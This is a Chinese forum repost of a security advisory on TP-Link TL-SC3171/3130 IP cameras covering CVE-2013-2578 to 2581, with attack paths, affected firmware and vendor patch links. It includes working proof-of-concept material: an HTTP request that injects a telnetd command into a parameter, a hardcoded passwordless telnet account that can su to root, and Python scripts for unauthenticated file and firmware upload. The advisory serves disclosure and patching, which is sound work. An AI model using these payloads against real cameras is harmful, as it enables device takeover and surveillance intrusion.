设为首页收藏本站

安而遇随-随遇而安

 找回密码
 立即注册

QQ登录

只需一步,快速开始

搜索
查看: 1513|回复: 0

TP-Link网络摄像机的多个漏洞详细分析

[复制链接]

 成长值: 50440

发表于 2014-8-25 12:31 | 显示全部楼层 |阅读模式

马上注册,结交更多好友,享用更多功能,让你轻松玩转社区。

您需要 登录 才可以下载或查看,没有账号?立即注册

x

漏洞描述:
在TP-LinkTL-SC3171 IP Cameras网络摄像机的版本为LM.1.6.18P12_sign5的固件上发现多个漏洞,这些漏洞允许攻击者做如下的事情:
1:[CVE-2013-2578]通过文件 /cgi-bin/admin/servetest执行任意命令。
2:[CVE-2013-2579]用硬编码身份凭证的shell执行任意命令。
3:[CVE-2013-2580]执行未经身份认证的远程文件上传。
4:[CVE-2013-2581]执行未经身份认证的固件升级。
攻击路径:
通过结合这些漏洞,多个攻击路径可被利用。额外的攻击路径也是可用的,但这里的攻击路径可以让你了解攻击者如何危及受影响的的设备。
攻击路径1:
(验证:无)
1:通过[CVE-2013-2581]漏洞上传一个已经root的固件。
2:通过http:///cgi-bin/reboot 重启设备。
攻击路径2:
(验证:绕过)
1:通过http:///cgi-bin/hardfactorydefault将设备重置为出厂默认设置。之后,通过使用admin:admin作为有效的用户和密码绕过验证。
2:通过http:///cgi-bin/reboot重启设备。
3:通过[CVE-2013-2578]漏洞开启Telnet服务。
4:使用用户qmik(没有密码)登陆Telnet服务,并使该设备作为枢轴点。
受影响的设备和固件:
TP-Link TL-SC3130 (固件版本LM.1.6.18P12_sign5及以下)TP-Link TL-SC3130G (固件版本LM.1.6.18P12_sign5及以下)TP-Link TL-SC3171 (固件版本M.1.6.18P12_sign5及以下)TP-Link TL-SC3171G (固件版本LM.1.6.18P12_sign5及以下)其他的TP-Link网络摄像机和固件版本可能也受影响。
供应商信息,解决方案和解决方法:
厂商提供的测试版修补固件版本链接如下:
[3] http://www.tp-link.com/resources ... sign6_TL-SC3130.zip
[4] http://www.tp-link.com/resources ... ign6_TL-SC3130G.zip
[5] http://www.tp-link.com/resources ... sign6_TL-SC3171.zip
[6] http://www.tp-link.com/resources ... ign6_TL-SC3171G.zip
最终的正式版本将公布在未来数天,请联系TP-LINK了解更多信息。
技术细节说明和PoC:
1:servetest中的操作系统命令注入
[CVE-2013-2578]文件/cgi-bin/admin/servetest有几个参数可以被用于操作系统命令注入,这会导致通过身份验证的用户可以执行任意命令。下面的PoC启动telnet服务:
GET/cgi-bin/admin/servetest?cmd=smtp&ServerName=1.1.1.1;/usr/sbin/telnetd;&ServerPort=25&ServerSSL=off&RcptToAddr1=q@q&AdminAddr=q@qHTTP/1.1Accept: */*Accept-Language: en-usReferer: http://192.168.1.100/progress.htmIf-Modified-Since: Sat, 1 Jan 2000 00:00:00 GMTAccept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64;Trident/5.0)Host: 192.168.1.100Proxy-Connection: Keep-AliveCookie: VideoFmt=1Authorization: Basic YWRtaW46YWRtaW4=Content-Length: 22:telnet服务中的硬编码身份认证
[CVE-2013-2579]受影响的系统包含一个不需要密码的硬编码登录,这会导致远程攻击者使用这个内置的telnet服务来登录受影响设备的操作系统,用户和密码:
username: qmikpassword: (none)qmik用户被允许执行命令su,这会导致以root权限执行任意命令。telnet服务可以用通过[CVE-2013-2578]漏洞开启。
3:未经身份验证的远程文件上传
[CVE-2013-2580]文件/cgi-bin/uploadfile允许未经身份验证的用户进行远程文件上传,下面是Python PoC:
import requests fileName = "lala.tmp"f = open(fileName, "w")f.write("lala")f.close()requests.post("http://192.168.1.100/cgi-bin/uploadfile", files={fileName: open(fileName, "rb")})上传文件(在本例中lala.tmp)将会被放置在/mnt/mtd目录中。
4:未经身份验证的远程固件升级
[CVE-2013-2581]文件/cgi-bin/firmwareupgrade允许未经身份验证的用户执行远程固件升级,PythonPoC如下:
import requests requests.get("http://192.168.1.100/cgi-bin/firmwareupgrade?action=preset")fileName = "COM_T01F001_LM.1.6.18P12_sign5_TPL.TL-SC3171.bin"cookies={"VideoFmt":"1"}requests.post("http://192.168.1.100/cgi-bin/firmwareupgrade?action=preset", files={"SetFWFileName" : (fileName, open(fileName, "rb"))}, cookies=cookies)引用:
[1] TP-Link TL-SC3171, http://www.tp-link.com/en/produc ... mp;model=TL-SC3171.
[2] Security Analysis of IP video surveillance cameras, http://seclists.org/fulldisclosure/2013/Jun/84.
[3] http://www.tp-link.com/resources ... ign6_TL-SC3130.zip.
[4] http://www.tp-link.com/resources ... gn6_TL-SC3130G.zip.
[5] http://www.tp-link.com/resources ... ign6_TL-SC3171.zip.
[6] http://www.tp-link.com/resources ... gn6_TL-SC3171G.zip.
原文来自:http://www.coresecurity.com/advi ... 71-ip-cameras#other
安而遇随论坛   


来源:网络转载
随遇而安
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表